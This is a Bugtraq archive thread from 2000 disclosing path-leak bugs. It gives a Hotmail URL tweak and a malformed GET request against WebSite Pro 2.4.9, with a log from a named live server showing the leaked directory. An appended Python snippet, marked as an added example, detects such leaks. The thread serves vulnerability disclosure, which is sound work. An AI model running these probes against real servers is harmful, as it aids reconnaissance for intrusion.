Bugtraq mailing list archives

Re: HOTMAIL is revealing Webdirectories


From: emild () TDHP TRANSDATA RO (Gushterul)
Date: Sat, 15 Jan 2000 08:37:11 -0500


How? Get into your Hotmail account. After you are logged in, modify the
part of the address string with "disk=216.33.148.68_" to something like
"disk=abc.beh.doh.cih_". I mean, put string text in place of the IP
address. It will give you a nice error revealing the directory structure of
the server, and after this you will be able to understand a big part of the
address string.

Gushterul

On Thu, 13 Jan 2000, Lark Lizerman wrote:

I got a tip from Noah Rathaus about the latest version of WebSite Pro (2.4.9). He mentioned a server
where WebSite Pro 2.4.9 is run.
I discovered that the latest version is also vulnerable to the bug of revealing web directories.
In the new version, a change must be made to retrieve the directory name.

When you connect to a server send the command line:

GET /HTTP1.0 \

You now have to add a space before the last backspace of the command line.
That makes the server respond with a "404" error and prints the directory name.


Here is the part from the logfile of Windows Telnet Client:

website.oreilly.com:
----------------------------------------------------start-------------------------------------------------------

GET /HTTP1.0 \

HTTP/1.0 404 Not Found
Date: Thu, 13 Jan 2000 20:47:12 GMT
Server: WebSitePro/2.4.9
Accept-ranges: bytes
Content-type: text/html
Content-length: 216

<HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD>
<BODY bgcolor="White"><H2>404 Not Found</H2>
The requested URL was not found on this server:<P><CODE>/HTTP1.0<P>(c:\1Web\docs\website\HTTP1.0)</CODE><P>
</BODY></HTML>
--------------------------------------------------end--------------------------------------------------------

Here it shows us the directory "c:\1Web\docs\website\".


Status: Vendor contacted and informed about the bug.
Expecting statement about fix.

-------------------------------
Lark Lizerman
Contact:
Lark82 () hotmail com
or
webmaster () doc2000 de
-------------------------------
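
A defensive check for the kind of leak shown in the 404 response above, as an added example that is not part of the original messages: it scans HTTP error bodies for absolute local filesystem paths and redacts them before they reach a client. The function names, the regular expressions and the list of Unix root directories are assumptions made for illustration.

```python
import re

# Windows drive paths (c:\dir\file) or UNC paths (\\host\share).
# Heuristic assumption: a path ends at whitespace, quotes, parentheses or markup.
_WIN_PATH = re.compile(r'(?<![a-z0-9])(?:[a-z]:\\|\\\\)[^\s<>"\'()|?*]+',
                       re.IGNORECASE)
# Unix absolute paths under common server roots (illustrative list, extend as needed).
_UNIX_PATH = re.compile(r'(?<![\w/.:])/(?:var|usr|home|opt|srv|etc)/[^\s<>"\'()]+')

# Body of the 404 response quoted in the message above, with line wraps joined.
SAMPLE_BODY = (
    '<HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD>'
    '<BODY bgcolor="White"><H2>404 Not Found</H2>'
    'The requested URL was not found on this server:<P><CODE>/HTTP1.0<P>'
    '(c:\\1Web\\docs\\website\\HTTP1.0)</CODE><P></BODY></HTML>'
)


def find_path_leaks(status, body):
    """Return the local filesystem paths found in an HTTP error body."""
    if status < 400:          # only error pages are inspected here
        return []
    hits = _WIN_PATH.findall(body) + _UNIX_PATH.findall(body)
    return sorted(set(hits))


def redact_error_body(status, body):
    """Replace leaked local paths in an error body with a fixed marker.

    The requested URL (/HTTP1.0 in the sample) is left alone: it came from
    the client, so echoing it discloses nothing about the server layout.
    """
    if status < 400:
        return body
    for rx in (_WIN_PATH, _UNIX_PATH):
        body = rx.sub('[path removed]', body)
    return body


if __name__ == '__main__':
    for leaked in find_path_leaks(404, SAMPLE_BODY):
        print('leaked path:', leaked)
    print(redact_error_body(404, SAMPLE_BODY))
```

Run against captured error responses in a test suite or in a response filter, a non-empty result from `find_path_leaks` flags an error template that still echoes the resolved file path.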


